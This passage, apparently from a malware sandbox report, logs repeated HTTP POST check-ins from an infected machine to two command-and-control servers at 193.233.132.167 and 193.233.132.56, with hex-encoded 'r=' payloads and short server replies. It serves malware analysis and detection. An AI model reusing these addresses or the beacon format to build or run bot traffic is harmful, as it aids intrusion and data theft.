                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:35:31.546905041 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1207 | 192.168.2.5 | 51061 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:31.462999105 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:31.706831932 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1208 | 192.168.2.5 | 51062 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:31.893002987 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:32.134742975 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1209 | 192.168.2.5 | 51063 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:31.963516951 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:35:32.216950893 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1210 | 192.168.2.5 | 51064 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:32.386051893 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:35:32.639692068 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1211 | 192.168.2.5 | 51065 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:32.579780102 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:32.832335949 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1212 | 192.168.2.5 | 51066 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:32.993926048 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:33.242005110 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1213 | 192.168.2.5 | 51067 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:33.088392019 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:35:33.344263077 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:35:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1214 | 192.168.2.5 | 51068 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:33.494996071 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:35:33.747904062 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:35:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1215 | 192.168.2.5 | 51069 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:33.699347973 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 4
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:33.948575020 CEST | 197 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:35:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1216 | 192.168.2.5 | 51070 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:34.085194111 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:34.328098059 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:35:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1217 | 192.168.2.5 | 51071 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:34.201555967 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:35:34.458671093 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:35:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1218 | 192.168.2.5 | 51072 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:34.576683998 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:35:34.825777054 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:35:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1219 | 192.168.2.5 | 51073 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:34.819503069 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:35.064300060 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:34 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1220 | 192.168.2.5 | 51074 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:35.166915894 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:35.414800882 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1221 | 192.168.2.5 | 51075 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:35.325860023 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:35:35.581305027 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1222 | 192.168.2.5 | 51076 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:35.673603058 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:35:35.922187090 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1223 | 192.168.2.5 | 51077 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:35.941675901 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:36.184034109 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1224 | 192.168.2.5 | 51078 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:36.272294044 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:36.516016006 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1225 | 192.168.2.5 | 51079 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:36.436057091 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:35:36.688322067 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1226 | 192.168.2.5 | 51080 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:36.766957045 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
